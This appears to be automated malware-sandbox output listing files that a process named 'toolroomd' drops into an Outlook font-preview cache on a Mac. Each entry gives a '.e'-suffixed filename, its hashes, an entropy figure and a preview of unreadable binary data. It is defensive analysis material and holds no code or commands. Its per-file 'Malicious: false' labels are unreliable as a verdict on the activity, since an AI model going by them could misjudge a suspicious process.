Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.615217279138159
Encrypted:	false
SSDEEP:	48:EiBhGHv30B+kowdCpS961JnJxG2ogLMfJMjW/ANpq:dBhGHP0sjnCORJxLuAu
MD5:	60EB1AEF78EADD799C2F7FED45297492
SHA1:	D26E94A5F37A6430C277096242875DC492ECE496
SHA-256:	D6954DD0FD2958F7970F7397B1CAB2217385581670F5C6F6DAA0B65955EED2C7
SHA-512:	DC534BBD2EEFED83703D9727AB168184DBE5F3D3A16BDEED25BB587CBC70D6EC74E241714AC7E1E6D7BFB058730FB010160D82A7F9685293EA363F3FD9DEFD57
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.../....$.........j9]..g.=.=....b+..m.V..sR.+...Vl..E.7.;.TT.7E....._u9.O$#.../r.h...'.g.Th-:?w...%...e. -..A.^W.........9.....\|Zc&IE..:.....w?.....B .'..$..(o.k...p6!.q.....fX....\|..8.R....C..\|.<}..Ib...f.z.Ui..iP.........7.t!.v....x..."#.......c=12...`..]7...g...$4..r.a...H..E.:.4....ho.S...........@.....K7.f..[..oP..^..?k.......+...$z...sL..Oyb..1v.x.#..@.........w.8...n..em..TR9......L+O..:.T..." <...G....7jr.q......_X..V'...,(.$kuf.."F.P.Lg....k3.....x...v6.GH.oy.8.`37R.....F...."..X......c..y..9h..n.qr..C.s.....7.g...4U...(...yp.A.{..?.z.s..;.M..<.b.W\yx0..g...o...d..;..D;Q....!9.S..7P.m%.+..1........+..C..........'.$....^....i...... Y#._k.#.c.{.Y.....6.O.U..M..~D....\k...]$. ..3..9b...L...{..%V.R....Y.-8........z_0WX4...,Q/.x.FYC+....!......E..P.E:.D.r.di.K..z.#....0i@.......S....g!rC.....sc...,...).....l-.........V......O+g..~.N..*5...Z47".o..z7...+.EO.c.5....K.b .dNq.Y}...W.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PMingLiURegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1458
Entropy (8bit):	7.475645660792161
Encrypted:	false
SSDEEP:	24:EiDXQ9QrvPZXcZCmI8zi16Gg0lMlXGybhShUH8ulYsePc0m7:ESXQ9QrnZXc8X8fGcXGybhSectNpq
MD5:	EC8E0DC6407A82FA59A6FCCDE2DC19B2
SHA1:	D512CC16C21319CEA3AA049F172CC09E3EE765DE
SHA-256:	13051FFED6BDC6166C5ACC914896892506DB2EDAB7553677D996BBEEFBB3133D
SHA-512:	A4DC7E9230AC43DF24B82ADFA8134BB52D939E8B9938225EC1B4F02BEB859347A5992DBAE9C593CD64E9DD95D34DD3B20410557BE899AAFA132BB97F9216DB5B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.?.3."-.R.:.3I.e.JaY.jOV. .X...[....O....;ho.%`..AL..i..~........K...LX...z...PJ...B.t...]Z.t...`...3.Q....eX..+..{k.Zv8.-6.D@Y..!....}..}...7".d..r..q...-+.".......Y..K.HYL)Y\"6....x.<...W+.R..S.....P!.g..h...c..e..}....+-.......M.J..`..C.......]O.F.(.......9W.U.8X..#[..... ..9.hr.)...5.O(...5....?._...I.? i.._..$.X8..!.#.:w.n..X.Y+...P}........fR=....C......3u.K....j...l...w&.........@t.S....3.v.."....^j~..Q....^..T.......=.?.S..a.?...9GXg.j.yd.O..vj7.....-..TaMl...[..v.!...]R...$.cT).....Pw..#.wQ.a....."..J......@0.....!......@F)...L...)..+.m....E_n`F.h\.Z6...............P...,.t...Q...P..W.@.Sd......)...?!......Yf.7.8y,...).L....7.Q.R.\..k..#....wr.y...._...a.X.z.....(v}V.B....%.M.^`e..".C.x{o.%.. .........VWR.....miv.6...a._.....`....W\..`.j/.......Er.."..f.h.....j....-.......F../Q.H..[.ST!.B.\..~'-....~..W.V,.i.h..x.v...>..Q[.D...=.....cA....ao.&T....:..m.......Y.0.J.B.\|9..f.....uD....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT MonoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.2439762710285365
Encrypted:	false
SSDEEP:	24:Efu1Qj9JHmZdLEaX4KLYEwlRR6fzU4jXVD6tHUcrfsePc0m7:EfOQBidLjX4KLYEMo44jVD6t0crfNpq
MD5:	B031D668F10B21213600A41FF3B8A021
SHA1:	45F09D72A9B9FB0F92D88E89AB82CF207F6669CA
SHA-256:	2534BAC94DB73713415FFAC4BCC8A0AEDCF2C5999392543D70D3E23FAD4CDC43
SHA-512:	1B1FDAEB1E2CFA7093B859752379ECF8330BC0295F246ACDB8A6C2203BD5CF2FAF576D7FD353A830B341B0CDDCAD1A978560CC3DC829F09E5FBFDAF5E87EAA09
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...@..x.W]..4v.=.. ...p.f.J....T.S...G.......p...........F....\|...a=.V....7..7F/...L...I..........#.Q....]...Y.M/....~....../r......"t....oy...J...q.5...Y.:tPp._.S..+..x.....G.....Z.YR.^(.d7.....[IY;.m.....~J0..>......P'p.)+.p.....y>${..=],..[..6m.....wD.=.I~.E..K.....0.....y.QN.W.^.B.............2<.O..z..xy ..........c........1[..........l.=..w.-.dp....l..p...mCqI...+..k(..b.7.>....k.......E....1;i..?..i.N...acXWU.6...!.=..~..u..T.p.....ad.4.S..X...7e.Op...[.]...YPw..[l@.L.7D0.N.........~.L....w..'....].....=Yb...Y.qp.R6i/.;........w.Z#d..t,.......A).M....T`..]$.t4..).+...Y.(.5YZ#!.U.........!..j.wW....0...../..%G,.p....b..$.y...7..b..e.O..y..~.e6q..m.H%0A.G..~..........X.?...x.....@0.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT Sans CaptionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	7.616692025895343
Encrypted:	false
SSDEEP:	48:EBusvHMbdCOqh5UQvwy7Z6H+5xhfTDKd3RRV5onN7zrlGNpq:IusvHMbddqgQvlM+ztTWdLiNXpGu
MD5:	180DCA679A3A26BF50B325B36699FFB9
SHA1:	BB0046C3EE00E8E7EFF0A87CC1439BD587BBED12
SHA-256:	77DE17ACB93BEC72E79832FA235513C1B3FF8F47E304CCC53A561AB92EFBE64F
SHA-512:	097809991C7F6728465599C3708C4497F6E92B9698C321EF95DBE8A856B32FB13C6726EC326777048DE704F6EEAB2FCA4FD487FAE5E8CF3CD0C12692C008B5FB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.p....".{.....y?.........KH.rz...\|....5..Z_tt.....k3[.\|.\.`..fc.z.?.,.i.....@.1..a.W......w........"FWb./A.W....V..W....V..W....V.e.....t.V.j..6..V..u.3...v...f...%Z'pkO.g.../U.0-..~./'dy.j..b.r..p.Ww-.U:N2.l.HE...Q..5..v .]Y..r./j...2.X.d..`{...r.Fl..6..O.G..m%\|..+.QLqU0.....i.{.1...o....n..@q.v2.g..}.......N+ 1?.".....).-...U,....a..y``.&..d.2`..=..GX..l..H^m...)./..0a<.:_..;B...x%.c).S.^.F..B.Y#..V..N...PL..4L..oT....QX..X.%._.M...\|..#.$..Y..0i...j..z.$../..-.R......z.t...ds...qE....X.N.....e......@]...u.\`.K%.s.>....[..V../$....q.m..4j@..V......aMD.6.E......!gV.}vUi. /......_..-;.........5.......<qB.)^.P._.\|u..?}...S.L..........Q...;.rDR.....)...aU.u."JV...k..4.."t.Z....`.P..H...h............mX......./.lCq.H,..lZUD...o.H(z...B../..W../.r...\|.7.^..q.c.ERn........). .:8.?..#xX@)`....w.d[53c3.agoT....'2Uw....Y).....K....vZ{N;..`.y....,T ..O.\cx.,..{sX...W.k.{..#(....V)9$I....:....(S.}...<Q.\.:

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT SansRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	7.3089737392594
Encrypted:	false
SSDEEP:	24:EcU2iYaZC1dVKYguVnqnZI7QlAJGhHoT7GHF1OFfkjm1oCn3OsePc0m7:EnaT8qnOo1CmfL1oC3ONpq
MD5:	7B3C0059CB3964B592930EF41481BABF
SHA1:	211D07169F6494D1BFA59DDF6FB3247110BD76C1
SHA-256:	CDA79427DFEF6D9EFC465B2B40E13B4B3E55C5CE519584C42488BFC3F9C79E71
SHA-512:	EE50D6446CB12B79ACFAD31425481776593292C34D00F1A73BFDE60D6644FC56589A6020515697296210DF8BF3DA92A12106011D9A7E4310B237CA07E081B4F4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.[L.y.. .1h....a...w3..5.#..;g2...~Pxv).e0.7.r.M...d7.L.m"...Js..g.)..%.....+.v..V..A......3.BP}..............Z......{o........9.".?.?z.....c.w.[..Y..i.$.........f(.,6......"..%X.C...) M..Q...I..1../X..YZL.w.MWQ7..P.G.rr9fd.........r^.#...t....$....=.!..P4.R..J./DY... Q....s......#X.1..F..."..._.3"rf(..K......D3...{.}..g....Zt.:Y.]m....E.jU.8.k.......h.u.@..}=cf.....{..p....K.Um.j5...Q!.b..../h...>..(.X.....n.;i-@..[ a.-..m...G/.......S.2.l..wC..c#z>.,_._..../.....e,p.W...pR...C.._<>...?.Vp...T...v...U...R..4..h..5...d..[.....R.......+SBfqUV. .J....jn$7w2..z.8<$..).....o.\......9> c.PP.)xV..6.G..;..7..G....j"F....aq.;........:t0..X'....2.N!Q..V.B=.\..W.n._.c.2.....v..H..e..k=Y'za.(V.cz).wl..n...N.e...R2.P...T..A?..9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT Serif CaptionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.64713976902638
Encrypted:	false
SSDEEP:	48:EfWjpBW1hnd2OTJsVuKMoNHxy9oVeX3Npq:T1BCn9TJsVu+HxynX3u
MD5:	54F7678E65DB579694FDDBFBE21D5533
SHA1:	337773ACCCE54817641FF911C57D1184F3C596E9
SHA-256:	2558E362CC7092BD1398E3F92D2F78E4CF5E77CFC888565A36642EFD3FC5FAAF
SHA-512:	19074959542A51A48E8091A055A52A5B3635848AF6BCF6616943744758A99F33276D088B99D33E05E31B928CFE7FB9CB1D26EA91115989A270F4FF17C57102A4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$........,....C6.'.......... ...U!.....z.?q..K..".......\.PD...\|8.T.C..ZS.?:'....8T...}.-...n%.v..pG...j..$1...j..$1...j..$1n+B..E3..Zw....A.J.8... ..m...q..b.1...3...w..;...=1.<.l.S.&.2..UPJL...<d...N5.._.@....s...T..(.D....\S....JR%..w..V.N.0.F.Sq.:3!...zN.....nS6....6I....Q..k.....}...............[ ...Qf3.....Q.d...'R...iI6.u..U.m......=....x.....U.m>Y7.]J...<.PU....Mr..7xp.H+./.d........./...F7.0.....3.J..#..................B.s.!O..`.is.... @0....]]..Y.>/.SB...rg.Z..c...k.z.iEDxl..;..e_....qA..:...i....~^.&...h..4hh.P...GL......M+.p..].G...H....(v.;.do......:.."...*k..l8..^.gY..jL5H@y..P...i{z({..Gz..dny+o.'5HHb.0.Cx8o...z.#..b..s..U..`.....6..9....T..s.-m:s..;..^.....@.........Z.:f..f..R.i`....}..=d....i......Lx}.......izz.%G.MQx.L.l.:.4..}B..S(B0.P...0/..x`...b.y...)Z.Lv.R+.{...].....7.. ....n.nPt..o.........,C'W. ...x.\[q.......eSz.^..^.........S......f.s.<..V&.8...!.?.y.cv..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PT SerifRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.3386975329637645
Encrypted:	false
SSDEEP:	24:E+LpXud93O10yFpzO+dEI+jx7xGu6mY9IZPfegUGGsePc0m7:EoMe10QpzREI+jThZPfegvGNpq
MD5:	0308ADC42F2CCDC260F90CDB59279F32
SHA1:	8D986E8EA92883ED2016B6FE04CA6352FB70D8AB
SHA-256:	3865809AAA8D9AF68E084B8BF213C837DF817B1F624ADC46F4BFC560CFE24595
SHA-512:	AA64D499551F41534E3A0AB579786F767C776A825BCF1501FB995C0759410CA6D5059FDC30FA7F313833DF5DC87D97BEED09B9DA7B9B019BEACA17AD37640DAA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.at.\.E.H.....Q...[..f,...X......~.......2=.....-T.H9ga..b.}./....8A08...#......@..../Iy9.w..v.....D.l.P.I..fVY'za.(V.Y......1..!..%$..x.6....$JK....#.....:'nG..>G_....z...&M..>C.a.....om=c..]..E.N..Dy.(.B..8.6..\.........,F..>@A5\u..GM....Z(\.....fxe...\|$.T.&....V.t~0J.8[.SX@R.bC?B!..........l..?.Y..y..mZ=f.o\.+m.;........o. h..=ikh}.q}..w....H4].H. &.}.cZ#.b.Z.3.'..Vb....-....\..6B9.#...1..U......S....G.y..v..~...i6.PKV..../..W.\|.5.C...p..6`..I........X.....WjF.....Z.Q..........4.!...Y.v.pn.E..l....u.,.M`/./.....$?_.E..n..a....(.......6......g.0.4.d^.Vri...4.k..B..~q0j......K....\|3..?.Wd.S..(........q{...<wCh..._V.T...O..},.1.B..{pa#..K.h?.N~..P.t_.F.I..=.....K.t....[...k.#,4.%@...zTr.Q.x.(....O9.p..%;38&P.....E...%..K..e.=D0..>............U.h.Jl..IPQ......}^.{....../q..2Quw..f..sy..np.yf\|.3......%.M..Z7.E\.:....n.n...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PalatinoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	7.359881060333437
Encrypted:	false
SSDEEP:	24:GfiCPEqAajFEw+0hUK1uqvF4IrweHpPlJJ/5a6McM6JH3bmVDK5jp1sePc0m7:MPqY+X8uqvF4IMSvJ/5kMXbgDKRfNpq
MD5:	C479992EC3A0E2635C2F39D7CE99FD81
SHA1:	AF6D87FEB4529F65C189A3E1FBD8E622CCA58F74
SHA-256:	4FA1C1A5832E99A8AC3C827D2AEF25E015FD1EAD3DDA809AE020A12E9DC3404A
SHA-512:	6F3C884008A617F3BA92BBB0A29AB24CD379631E2123073010ABB23DD43B2109016C47193AF6F4A9D8D7097C477B708201290728A2A991741676FC9D5A7CC837
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a....2./..1h....a.n......B..).>..7Gwg.qN....yC..KE.?....KU.5...jm.a.:x....j>7).B.....V.g<.Z.....8...y........F..d'.rr.G...y...d...3.wG..3....Q-..G_h)P6..e...\.m...8._.J..B.0.F.;....A.........Y....2T.%..R.x...A..3...?T..d.y......J...s%.)y....S.D.....3K.&..1..-^`.bn..AY..t..@.......B..]=...-..u-..H=.).&.y.........:..Z.K......f.F....p..)ti...x8A>...d.I..N.O.....}..X...`K.v...../.).......Y]U.n..`.).8.Lh\|.f......$\|.....mh...x(...$.$.?T.....:....8.P.<.M......u2.~M....R.]..:4i..d..4.6cv..V.U......".n..$.%.NAg7..m.is.\|.-\.9l..L.8....c.^.Z............51?...J&>..dtsh.....z3!.....(.`../...U....q..S...X..]....../......)..iZb[.(......EPB.........[{.....e......f.8_z8F......P..JKh.$p.p..p.o....F\|.}....w37{i..........I.E.BA..<@a."`..2-.5..".(@....3:-..3...2.Q......lB.p-.....@3............u:....~/.:.(........3$.H......{.y.;>.\|.s.....+W..#.Q....]...Y.M/..5Z..F..*C8.Vy....\...D&.?.\|b...................\.........^./

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PapyrusRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	7.249062312999798
Encrypted:	false
SSDEEP:	24:Yuu/M/OliwZswRXxtEKSylZABbd7/qFBNm9LqsePc0m7:YuNOlfRXxtEKSQOtQzceNpq
MD5:	89584D583F0D41839A89FAC05150EC7E
SHA1:	3DC46090660189FD39277A6FBF573C6055178EC3
SHA-256:	2E7953087098172872E1E3033C84D8D7A400D6E7B313186C4E1266EB152046EA
SHA-512:	C27326631267B6726CF6AE236C052857EE0E9139FCB1B4202A516C29646C4B13B8DDE656C950653BA863E3776851A35CC06156477067596738E8D9AB695CC215
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.3.}..}.jLc....J..(jy.....).o.".K\|.1N.... .t.K....U.3..y...e.i.`F..{7..c....8..X.tX.)f.5....QZ.gM.......~#2R-.-5"s..}m...z[$.........Y8.J5)K.2.z..1.R....9......Ah.l...U>X._....tS6@..&.,F.Sz>oJ.4._..tQ.......R...[.}...3.!.,+.v..C...........["....z..X.......xk.>..D...T...6..A.L...3.f.`...f.......y_...9...G.Rz.h...^-{.3..k.N9.}A.ah...Jx2.Y%.9r.....k..o./.l.^Jk.]ck.._..9.........W.m...\|.......7jf......v.>....n?..x..P......6.F..y..a...qw...,A;yf.P...{q.bLf.....q."..L.."T.~x.d.....m...V&..+..%._y.......T...)].G.~D..=h...fhcm.I/...`... f....OxB4..w....{....M........C.q%.?,....Z.P..]..w...'.\|.w5+....%x6...u.}..[d....1.xd/w..#.. ..c.....3.l.U..U.../b\t.g..-.W..).j...6...M._&...[.5...6..}.Y.i.j.~...%.F.!~...oH..DA5....N.....@[..nM...2.>..h.0.$j=%...~"#.....I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PhosphateRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1698
Entropy (8bit):	7.580877137460419
Encrypted:	false
SSDEEP:	24:EUAhexCzC2OvZcCoejUVPmiMXf8exZ/84xzMZUn0W27yNHsePc0m7:ERe6qRcCdjwMXf82Zjj0ZaHNpq
MD5:	F7053AAE9BD7DF9E2B75CBB8A4A7B388
SHA1:	1BFC5C5AE10CDC3D4ABC76BAC3043E940B08C452
SHA-256:	981F749B3D6C344C55B1546DB2AA4B0DB053211E5B75082F48406C339931B5CC
SHA-512:	96026B562CD41593E7BF4A6C99598AC4B605CD9EBBD4A90A3DF0531B47A6095CA334C006C573F1DD11572B5D440A5A2EB8BCC271DCC7BD80121E9A3BAED5E36F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...@0.W.2.E\|."Q.z..k...u....n.!.c.O.....4.F..U.s.k[+.......k3......?..V%...Dev....2Bs..r.....\|U{....B..M...+..n...+&/....q...>..-..'.)..@.3.V.....!>.2.M.}........S...}.}.F....^...,O{.]].S..U...:......f.n.=....K...f.M.3...P.E.......b..<'_t..c^.... F...~.;.V.......A(#F...B.....`.g._.T~u..jKXL...p..f.(.....T..f... .....;.g...qK...GG.`.W...Y#S@...sz..y.j:..+.:.....F=..HKS.j.2....i..=..]....yu..$...ZL...]&..<1..\|.4AX?w...,.yv.R..h.-.^...Edf.y.b.DW.z#..l..[M3R\|....=..7...<G~.tJ.7.[xQ......!.../.x....e.+.2.U.B5....KzB..Z.j.. ,.M..YH...Y.fq.m......\.1...Y.E..%J83.r &h.`.{v......!..,"X,hZ .......S..1q.S.}J.g..&v+...W>gvI.m.q.{....s.r....#.}W...9....k.._i5F.. ..A.'.D.m'.3u........4.....q.J.0....R>)..\|.N.P.&..\|.......r.......v.O....~....Q.v..X.....EwSvq...0.p)%..P.a...+...2P....hY.gOe...`O.J+XZA 2.)........5...N..3.'*...4.U..c....\|.....J"...B.Z.w.t.e.&..~3br.,/..7.]w.&X...iPy..G.,M%./K.MF......e...#.9.q.5.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang HKRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	7.404476637751245
Encrypted:	false
SSDEEP:	24:EaQb8Qx8+mEe8vFDph1tz+3G2n5LBfY7S4pRb9IgFf4qYsePc0m7:Eaa0kvRa22nrfY/rRjx4qYNpq
MD5:	AF3CFAACD4DDD315538EB3C8DD9BA701
SHA1:	583E479FFA414648AFDA546FC474454DD6389506
SHA-256:	997929CA3965CC1229BE79E669D8F84E21656A240CE941673FECF21C47C99381
SHA-512:	D3CEFB1EC61FEB6EAAC9EE28D9ED5C85BAC332051470A92B20E4050A9E97A89ED58A548CBDAF1A4D05FB01D451E397B004466C2CFE0B2EA2838550E05D6D9E95
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ag.......=b..T..{F?.c..b...S..M.w...kv..... S........(3.C..DB.S..bI.:e.?e..m.j.h..\|.)..g..I..iAO.%...b.CY.+..{k.Z......>..D..{.....Yj...6.......O.i.c....X..N....^#..ff.s......`5...1...........\i..dw..H.^...(.\|.?...e.el.....G~C...L....uF."RC.U..P.0.f\|.v...^/.N.........~.b.L.@..v....W-.s%.&HPg.@.Zq.....U..y...,....!.\|.1.{&....Mc...j.w..Le..0..^.w.r...L}.k.I..HE3.....toN$5.,..N5f.J.^.P1..._.....F.H...{....j.B.u...k.P.y.k...<..5.6...ZC.&..,~I5.=O%9.d...k.h0,.E~..e.J...kg... ..;.......$.^..2....3e...^ .G.r...\...a.L..8.".4.W....PM...]......V.b...........>.L$pe`.n#........q@.N.M..@.j.U....4.a..1,?.(D.k0.}.I~.?<.....`.V...h.$..q..?>...6.UL.:].$.a3.....?]b..T.N1d.....S...Q...dnh._V?~.h}-...Su...L~~.0r...L.[43"..[....f[...Rr.%...!.....,....4P...xJ...s.....<T..23....!.h.g..[V..9.....OZ(..k..>ArQ5d.~'...q.:.:.JT..F...$.(vn...Apa...R..........k.'^....Ch.ogs..<G.m\.X......\...h..ZM..+1.6.U%&..1..7......F.7....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang SCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.468652076242319
Encrypted:	false
SSDEEP:	24:ElFS5zO/INtBJXJIv24wXB+FDTh1hCVjXWr4lqdUiC6dsePc0m7:ETEC/UtBJXi2X+9ThOVjYp/CENpq
MD5:	B6529B47AA9ABA3F44F836116F505638
SHA1:	54E96C7D4A5620A9F0AF122043183614E8D5582F
SHA-256:	84DF4B45FC362C9C78D41CC867D963986E80AF469363D9B59A060E4DEF5A9FA6
SHA-512:	DD6652EB85E41AD5757EF6A0770D3142BE4D910FDB59E91B1E72FFFF560FAC65B9A8FF68B0822A7602D1867A9222B252CAC24D12F2532F6E435C6FDF8A9784F7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.1.....z..HK....._t..J7..#D...>.LBe..N..Y.."?.3JN....Dyt....+..../\|B.8Mz.C...z..[....H+....A..6...........L.X+g..!.$.......'.X.7....#...R'R...c.p`^.-....<"\|${\|.L.g....e..XU%.....H.3e..O..\|..W.....E1....6.,.)..O.m.0.H...:......M....p.emma..$wO\|.2..%..8{S\|..*.(..x..Y"}c....%.b....H...z..f.....C.z}.yUZ?.0.Gx.......[...d0k.a.y.s.A.......M...L.([4M.67D.c........-.]x.7'E.1.e.=M.. .......5..(Q......4....>..V.c.....UA.v4...".q...J...P.4?#UC}.1:[.Z.ke..J5........j......w.Y.....74..N..g-..n...t .." t. ;-........$.08.S...m..qf,.......(z.Y...S.,d..f.]d._]DQ}.....i.o.p....Z.4..M-F.C.Z.M.....<;.!I.....\...6..N"&..}.00..X..@....J.1.....x.I.~ A-~.K...8'c#.......`I.v...3HZ.s....oG..5.ZhL9.>........~i.."YGh..gi......-=>?.M...y...tP.$6`.m..b...,..........@....R\...5.....8t....[.bA......DT.x...E.Qm.X.7.\|..R.'...p{..Z.-T.{..F{zTtPz.G.Z.UT#.H}xw....>..u....\|....S...Q...N.3....j&...&6_...+....Q.Y..y..U..Be

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PingFang TCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.427250368993555
Encrypted:	false
SSDEEP:	24:EHNukPRZ0wU+9poWq8udXP+OlosHM3wcOecUWMLp3UOKdMiTVebGsePc0m7:EHNukPRn9poV8AmOloInc5MMLK1cGNpq
MD5:	BDA2C3B293E052EACEDFE3CC31496E98
SHA1:	816BD733DD89B92CB916DACD3F450B3B0385219A
SHA-256:	8BB615090283A0A608C30C1A05BF2FBAC1FB0C639B88C2F95E7431D87CD02F76
SHA-512:	B7F56884CCCBA7C11A839DFE7815D13CF1E4E840C5410BFCBCB07CCDDCAC783FDE6303E76292DEC8608332A10F25558A3C23330620997353ED0DE3D73B8A15EE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.af{...y...i.\|.s..UO.....o.;..(....~..?.`.hS...F:.t..Y<\|Z.A..L.9F..z.%.]p.8.Ft...\b.....a....,.....F#..d:~o..O......uFh#..9....=J..D.B..T...(.'-mF...s.o[....Z\|{"L.O=..-..mi$.......u........k..&zAz.:&r.~\|2J./..}......o#.Cj..d\|.ti...4;....d..R.N.~m..$.....fJe..,U+...T.R>..F.T...{jID....J%`\|.w.B..Y.../..z.Ca...f......,.6.-..7.L..N.\..Cb.y.._.v...5"'......)<0....].].R.D..........u.7..k..d.8^...............`.....mb...!.....Nd...]..:.6)sc....z..y.7......r1...].`..t.A.6...d.P.....`.A.d....y.~MQQQ.i.8....&....`j..JD.........m.Z7w....$.`...e.......#b......M:u...,0..w..............).d......Q..0.T..~.+M.=U......d.+.../J.o..P3..tAg.J.p.p...`@Wq....0.....-+.+..y.H....q..}I.....&IN.......$...ib.D#%{f.2.U]~o.f..nK-.x.xA.gv.pr.h.L.b9E.F'..Xl.R..b`.....*x.?.WD.LT.B..M.e.H..Z..._.%....^...DJs++...;.w(...J?>..V..`h.....a..}../..3.......s..H4#=l.)-~..O[..t.=..d.....+..wWVl...{..`..B.....To...;.8W\

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Plantagenet CherokeeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	7.744302732641872
Encrypted:	false
SSDEEP:	48:Ex9cNx2HFochaaSlO3V0FfwQjnyHWyQXkoASCTOZnvx9GbGgmou3xTNpq:IcNx2aE+1wQ+HfxlOVrgcxTu
MD5:	017B5D811253081FF61D2BB1C3E8D285
SHA1:	EFF082046BD76435C5BE6B7D7B53047EB5E13B60
SHA-256:	06395FCB3766F4B2B9E7D195E8B4F31E7D04F1DB9F38AEC4B7EDD593C3BBC37E
SHA-512:	5D4BB5C7C3C3E7D64401F30C18BFC3BD2B1D65FDBA87024CDDBB50F4D3A43F6AC71A5CFE63AC1BD16E7EA71A1DA8BD7ACC77FAD746AD45CE3464D5392C197788
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..IJ'K.m...1.5s..wZa.0...v.d....c.....z..5.wy~V......5..H./.tt......#Sg........)S.w.V...w....z........8...]./...\|.]./...\|.]./...\|.....u.>zJ'.>.B.{..%.w..#kZ.`...t..f.....74......R[%0(.....J.{......4<.R._;.b......ik..E.^..ZwhUK...}..n}.xr......K'..."l.w..T......WN.=O&.ki.Xj4...`b....J....U.?84a..N...n..U........8......(+B....7,...r.pkX ...I.oXw.~x.~.^l..n..?..W...[........BO....... 9.U....F...,..4....._..>..[MMA.B..G...F(.G./w.......a.RP.....Hk..T5<..9..B.2PQHj..i..A..e......+.+....%....r`j......2...b.K2.).....JmG.5....b......x....f#.L../...~'.....X.......5k.S.s...dI.......A.g..q...Je.:..{54f....~...Z.<..y...c`...Hp.CfM".UAl[.X.f.. ?.}.2D..%..h2......md.Cvxn.X......)z.?l;..q."...)9..w.V.f.....n...=p.O!. 